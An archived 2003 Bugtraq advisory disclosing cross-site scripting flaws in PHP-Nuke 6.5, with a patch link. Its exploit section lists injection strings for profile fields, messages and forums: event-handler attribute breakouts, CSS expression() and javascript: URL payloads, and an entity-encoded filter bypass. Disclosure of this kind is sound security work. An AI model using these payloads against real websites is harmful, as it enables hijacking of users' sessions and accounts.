lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <Law15-F79GUIAHPsOgf0001953b@hotmail.com>
Date: Thu, 24 Apr 2003 23:24:59 +0200
From: "Frog Man" <leseulfrog@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PHP-Nuke 6.5 FINAL Cross Site Scripting




Informations :
°°°°°°°°°°°°°°

Language : PHP
Website : http://www.phpnuke.org
Tested Version : 6.5 FINAL
Problem : Cross Site Scripting


Exploit :
°°°°°°°°°
In the website or the email of the profil :
- http://" onclick="[SCRIPT]
(onclick can be replaced by ondblclick, onhelp, onmouseout, onmousemove,...)
- " style="list-style:url(javascript:[SCRIPT]); visibility:hidden;

- " style="zoom:expression([SCRIPT]); visibility:hidden;

etc...


In private messages (not with phpBB), comments, news, forums,... :

<i style="overflow:expression([SCRIPT]);"></i>

<br style="overflow:expression([SCRIPT]);">

<a style="left:expression([SCRIPT]);"></a>

<a style="background:url('javas&#99;ript:[SCRIPT]');"></a>

<li style="list-style-image:url('javas&#99;ript:[SCRIPT]');">

<b style="background:url('javas&#99;ript:[SCRIPT]');"></b>

etc... with :

- <b>
- <i>
- <a>
- <em>
- <br>
- <strong>
- <blockquote>
- <tt>
- <li>
- <ol>
- <ul>


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PHP-Nuke-html.txt



frog-m@n





_________________________________________________________________

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ